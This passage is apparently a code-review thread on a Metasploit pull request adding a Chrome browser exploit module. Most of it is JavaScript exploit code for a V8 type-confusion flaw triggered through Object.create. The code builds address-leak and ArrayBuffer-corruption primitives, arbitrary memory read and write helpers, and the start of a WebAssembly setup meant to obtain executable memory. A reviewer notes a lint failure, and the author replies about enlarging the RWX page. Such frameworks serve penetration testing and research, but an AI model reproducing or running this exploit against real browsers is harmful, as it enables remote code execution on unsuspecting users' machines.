modules/exploits/multi/browser/chrome_object_create.rb

```diff
@@ -0,0 +1,297 @@
+                    if (res !== 13.37)
+                        return res.toBigInt()
+                }
+
+                fail("Addrof failed");
+            }
+
+            function corrupt_arraybuffer(victim, newValue) {
+                eval(`
+                    function vuln(o) {
+                        let a = o.inline;
+                        this.Object.create(o);
+                        let orig = o.p${p1}.x2;
+                        o.p${p1}.x2 = ${newValue.toNumber()};
+                        return orig;
+                    }
+                `);
+
+                let propertyValues = [];
+                let o = {x1: 13.37, x2: 13.38};
+                propertyValues[p1] = o;
+                propertyValues[p2] = victim;
+
+                for (let i = 0; i < MAX_ITERATIONS; i++) {
+                    o.x2 = 13.38;
+                    let r = vuln(make(propertyValues));
+                    if (r !== 13.38)
+                        return r.toBigInt();
+                }
+
+                fail("Corrupt ArrayBuffer failed");
+            }
+
+            let [p1, p2] = find_overlapping_properties();
+            print(`Properties p${p1} and p${p2} overlap after conversion to dictionary mode`);
+
+            let memview_buf = new ArrayBuffer(1024);
+            let driver_buf = new ArrayBuffer(1024);
+
+            gc();
+
+            let memview_buf_addr = addrof(memview_buf);
+            memview_buf_addr--;
+            print(`ArrayBuffer @ ${hex(memview_buf_addr)}`);
+
+            let original_driver_buf_ptr = corrupt_arraybuffer(driver_buf, memview_buf_addr);
+
+            let driver = new BigUint64Array(driver_buf);
+            let original_memview_buf_ptr = driver[4];
+
+            let memory = {
+                write(addr, bytes) {
+                    driver[4] = addr;
+                    let memview = new Uint8Array(memview_buf);
+                    memview.set(bytes);
+                },
+                read(addr, len) {
+                    driver[4] = addr;
+                    let memview = new Uint8Array(memview_buf);
+                    return memview.subarray(0, len);
+                },
+                readPtr(addr) {
+                    driver[4] = addr;
+                    let memview = new BigUint64Array(memview_buf);
+                    return memview[0];
+                },
+                writePtr(addr, ptr) {
+                    driver[4] = addr;
+                    let memview = new BigUint64Array(memview_buf);
+                    memview[0] = ptr;
+                },
+                addrof(obj) {
+                    memview_buf.leakMe = obj;
+                    let props = this.readPtr(memview_buf_addr + 8n);
+                    return this.readPtr(props + 15n) - 1n;
+                },
+            };
+
+            function get_wasm_instance() {
+              var wasmImports = {
+                env: {
+                  puts: function puts (index) {}
```

Comment:
This `puts` is why travis is failing:
`modules/exploits/multi/browser/chrome_object_create.rb:236 - [ERROR] Writes to stdout`

Reply:
The webassembly here is actually replaceable with anything. I will try find one that generates a 16k rwx page (it's 4k at the moment).